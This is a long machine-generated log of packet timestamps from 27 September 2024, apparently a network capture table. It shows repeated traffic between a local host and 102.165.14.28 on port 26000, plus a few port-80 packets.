                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.489829063 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.549798012 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.677366972 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.677589893 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.832602978 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.832618952 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.832699060 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.832712889 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.832725048 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.832736015 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.832746983 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.832757950 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.832768917 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.832779884 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.832904100 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.833074093 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.975745916 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.975773096 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.975794077 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.975816011 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.975836039 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.975857019 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.975877047 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.975897074 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.975918055 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.975938082 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.975959063 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.975979090 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.976000071 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.976020098 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.976036072 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.976039886 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.976061106 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.976082087 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.976103067 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.976123095 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.976144075 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.976206064 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.976206064 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:22.976375103 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111355066 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111663103 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111695051 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111720085 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111743927 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111768007 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111790895 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111814976 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111839056 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111850977 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111866951 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111891031 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111915112 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111938953 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111963034 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.111987114 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112013102 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112020969 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112020969 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112036943 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112061024 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112085104 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112108946 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112133026 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112155914 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112194061 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112199068 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112225056 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112247944 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112272024 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112294912 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112318993 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112341881 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112365961 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112382889 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112382889 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112389088 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112413883 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112437010 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112459898 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112483025 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112507105 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112530947 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112555027 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112612963 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112780094 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.112951994 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.249757051 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250066042 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250097036 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250123024 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250279903 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250390053 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250422001 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250447035 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250472069 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250494957 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250519991 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250545025 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250569105 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250592947 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250617027 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250642061 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250665903 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250689983 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250713110 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250736952 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250761032 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250781059 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250781059 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250785112 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250809908 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250833988 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250858068 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250881910 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250905991 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250930071 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250946045 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250953913 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.250977993 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.251002073 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.251023054 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.251025915 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.251049995 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.251074076 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.251097918 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.251121998 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.251121998 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.251146078 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.251171112 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.251274109 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.251444101 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253251076 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253283024 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253308058 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253330946 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253355980 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253532887 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253562927 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253565073 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253590107 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253613949 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253638029 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253662109 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253685951 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253709078 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253732920 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253736019 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253757000 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253781080 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253804922 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253829002 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253851891 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253875971 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253900051 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253925085 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253948927 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253950119 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253950119 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253973007 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.253997087 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254020929 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254045010 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254067898 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254079103 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254091978 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254116058 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254139900 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254163980 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254187107 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254205942 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254275084 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254276037 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254395962 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254395962 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254396915 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.254396915 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.255057096 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.260270119 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.260301113 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.260324955 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.260349989 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.260571003 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.336558104 CEST8049737178.237.33.50192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.336726904 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386328936 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386389017 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386418104 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386441946 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386466980 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386491060 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386514902 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386538982 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386563063 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386586905 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386635065 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386635065 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386702061 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386733055 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386758089 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386781931 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386806011 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386806011 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386830091 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386853933 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386877060 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386902094 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386925936 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386949062 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386972904 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.386996031 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387020111 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387042999 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387067080 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387074947 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387090921 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387115002 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387137890 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387155056 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387162924 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387243032 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387305975 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387331009 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387346029 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387355089 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387378931 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387403011 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387427092 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387449980 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387473106 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387517929 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387522936 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387525082 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387550116 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387573004 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387597084 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387620926 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387645006 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387664080 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387669086 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387692928 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387717009 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387741089 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387758017 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387763977 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387789011 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387811899 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387835979 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387867928 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387892008 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387916088 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387929916 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387939930 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387964964 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.387988091 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.388011932 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.388035059 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.388058901 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.388082981 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.388102055 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.388106108 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.388129950 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.388190031 CEST4973826000192.168.11.20102.165.14.28
